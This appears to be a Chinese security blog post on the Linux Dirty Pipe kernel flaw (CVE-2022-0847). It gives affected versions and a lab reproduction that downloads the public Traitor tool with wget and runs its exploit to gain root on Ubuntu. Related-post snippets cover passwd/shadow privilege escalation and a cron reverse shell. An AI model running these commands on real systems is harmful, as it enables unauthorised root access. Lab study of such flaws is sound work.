Linux Dirty Pipe 概述
Linux Dirty Pipe 概述
1 Dirty Pipe 概述
CVE-2022-0847-DirtyPipe-Exploit 存在于 Linux 内核 5.8 及之后版本中的本地提权漏洞。漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用,漏洞作者将此漏洞命名为 Dirty Pipe。
漏洞影响范围:5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102
2 Dirty Pipe 复现
这里使用 Ubuntu 20.04 作为测试环境,使用 Traitor 进行复现。
查看当前用户权限与内核:
1 | yongz@ubuntu:/tmp$ id |
下载 Traitor 到靶机上:
1 | wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64 |
运行一下:
1 | yongz@ubuntu:/tmp$ ./traitor-amd64 |
直接进行利用:
1 | yongz@ubuntu:/tmp$ ./traitor-amd64 --exploit kernel:CVE-2022-0847 |
提权成功!
相关推荐
2024-02-18
Linux Dirty COW 概述
Linux Dirty COW 概述1 Dirty COW 概述Dirty COW(Dirty Copy-on-Write)是一个计算机安全漏洞,也被称为 CVE-2016-5195。它于 2016 年首次公开,并且影响了许多基于 Linux 操作系统的设备和系统。 Dirty COW 漏洞存在于 Linux 内核的内存子系统中,具体影响了 Copy-on-Write(COW)机制。COW 是一种内存管理技术,在多个进程之间共享内存页面时使用。当一个进程试图修改共享页面时,操作系统会创建该页面的副本,以确保进程之间的数据隔离。然而,Dirty COW 漏洞允许恶意用户利用 COW 机制中的一个错误,以非法方式修改共享页面,绕过了操作系统的保护机制。 漏洞影响范围:Linux kernel 2.6.22以来的所有稳定版本:这包括2.6.22、2.6.32、3.x、4.x等版本。(2007 年发现,到 2016 年 10 月 18 日才修复) 并且 Android 也受影响。 Red Hat Enterprise Linux (RHEL) 5、6 和 7 的内核版本。 CentOS...
2023-02-16
Linux passwd 文件提权
Linux passwd 文件提权对于一个正常的 /etc/passwd 文件来说,他的权限如下所示: 123┌──(root㉿kali)-[~]└─# ls -l /etc/passwd -rw-r--r-- 1 root root 3163 Aug 21 14:59 /etc/passwd 根据所学权限可以看出,/etc/passwd 默认是主要 root 用户可读可写,root 组与其他组可读。 但是,假设运维人员突然抽了一下,将权限改为任意用户可读可写时,就会产生隐患: 1234567891011121314┌──(root㉿kali)-[~]└─# chmod o+w /etc/passwd ┌──(root㉿kali)-[~]└─# ls -l /etc/passwd -rw-r--rw- 1 root root 3163 Aug 21 14:59 /etc/passwd┌─...
2023-11-13
Linux rbash 限制绕过
Linux rbash 限制绕过最近在打 Vulnhub,遇到了 rbash 需要绕过。 看着方法也很多,怕以后也遇到,写篇文章总结一下。 本篇文章参考: https://man.cx/bash https://www.lxlinux.net/restricted-shell.html https://www.hackingarticles.in/multiple-methods-to-bypass-restricted-shell/ https://blog.csdn.net/qq_60848021/article/details/130041922 1 rbash 介绍rbash(restricted bash):是一种受限制的 Unix / Linux shell 环境,它是 Bash Shell 的一种变体,旨在提供一种更安全的 Shell 环境,限制用户对系统的访问和操作权限。 当用户被分配了 rbash 作为其默认 Shell 时,他们将无法执行许多常见的操作,例如:更改当前工作目录、重定向输入 / 输出、使用某些命令或设置特定的环境变量。 rbash 通常用于限...
2024-02-07
Linux shadow 文件提权
Linux shadow 文件提权1 shadow 提权说明对于一个正常的 /etc/shadow 文件来说,他的权限如下所示: 123root at kali in ~ $ ls -l /etc/shadow-rw-r----- 1 root shadow 1478 Nov 5 23:01 /etc/shadow 根据所学权限可以看出,/etc/shadow 默认是主要 root 用户可读可写,root 组可读: 123456root at kali in ~ $ su kali┌──(kali㉿kali)-[/root]└─$ cat /etc/shadowcat: /etc/shadow: Permission denied 切换到 Kali 用户可以发现,是没有查看权限的。 但是,假设运维人员突然抽了一下,将权限改为任意用户可读可写时,就会产生隐患: 1234567891011121314root at kali in ~ $ chmod o=rw /etc/shadowroot at kali in ~ $ ls -l /etc/shadow-rw-r--rw- ...
2023-10-11
Linux 特殊权限位说明
Linux 特殊权限位说明在复杂多变的生产环境中,单纯设置文件的 rwx 权限无法满足我们对安全和灵活性的需求,因此便有了 SUID、SGID 与 SBIT 的特殊权限位。这是一种对文件权限进行设置的特殊功能,可以与一般权限同时使用,以弥补一般权限不能实现的功能。 1 SUIDSUID(Set User ID) 是一种权限机制,通常用于 UNIX 和类 UNIX 系统中。它允许用户在执行特定程序时暂时获取该程序所有者的权限,而不是执行者的权限。这对于一些需要特殊权限才能完成的任务非常有用,例如修改系统文件或执行特定的系统命令。 特点如下: SUID 权限仅对二进制可执行文件有效; 如果执行者对于该二进制可执行文件具有 x 的权限,执行者将具有该文件的所有者的权限; 本权限仅在执行该二进制可执行文件的过程中有效; SUID 在权限位置有两种显示方式: 当命令所属用户具有 x 执行权限时为:s; 当命令所属用户不具有 x 执行权限时为:S。 123┌──(root㉿kali)-[~]└─# ls -l /usr/bin/passwd -rwsr-xr-x 1 ...
2023-10-18
Linux 计划任务反弹 Shell 探究
Linux 计划任务反弹 Shell 探究本篇文章参考自: https://mp.weixin.qq.com/s/rmUXqYulX3pyrNfINk90WQ 看本篇文章之前,建议阅读一下之前写的:Linux Bash Shell 探究,不然容易把人看蒙。 计划任务功能在 Windows 系统、Linux 系统中历史很悠久了,方便运维管理。 而在渗透测试中,利用到计划任务的常见的有:挖矿病毒、Redis 未授权、Docker 特权模式逃逸、Cron 提权等,但是在 RedHat 系与 Debian 系 Linux 的计划任务是有一定的区别的,不仔细研究一下遇到了真的很折磨人(深受其害,每次遇到都是问题,淦)。 想起来之前学习 ActiveMQ 漏洞时使用 Corn 提权在 Kali 上复现了一遍,就踩了不少坑。 果然,懒惰乃万恶之源,是时候还债了。 注:本篇文章主要选取两系中的一个作为演示 RedHat 系:CentOS 7 - 10.10.8.137 Debian 系:Kali 2023.3 - 10.10.8.134 1 问题列举 bash -i >&...
